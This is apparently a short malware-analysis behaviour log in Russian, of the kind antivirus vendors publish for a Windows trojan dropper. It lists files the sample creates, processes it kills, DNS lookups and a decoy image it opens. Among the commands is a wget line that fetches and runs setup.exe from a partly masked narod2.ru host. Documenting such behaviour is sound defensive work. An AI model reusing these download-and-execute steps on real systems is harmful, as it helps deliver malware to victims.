Техническая информация
- %TEMP%\1.tmp\setup.exe
- %TEMP%\1.tmp\wget.exe http://ga####adm.narod2.ru/setup.exe
- %TEMP%\1.tmp\setup.exe (загружен из сети Интернет)
- <SYSTEM32>\ping.exe ya.ru -n 5
- <SYSTEM32>\taskkill.exe /f /im winupd.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\winupd.bat" "
- <SYSTEM32>\rundll32.exe <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen %WINDIR%\x_0dabfc9b.jpg
- %HOMEPATH%\Recent\x_0dabfc9b.lnk
- %HOMEPATH%\Recent\WINDOWS.lnk
- %TEMP%\1.tmp\setup.exe
- %WINDIR%\x_0dabfc9b.jpg
- %TEMP%\1.tmp\winupd.bat
- %TEMP%\1.tmp\x_0dabfc9b.jpg
- %TEMP%\1.tmp\wget.exe
- %TEMP%\1.tmp\wget.exe
- 'ga####adm.narod2.ru':80
- ga####adm.narod2.ru/setup.exe
- DNS ASK ga####adm.narod2.ru
- DNS ASK ya.ru
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: ''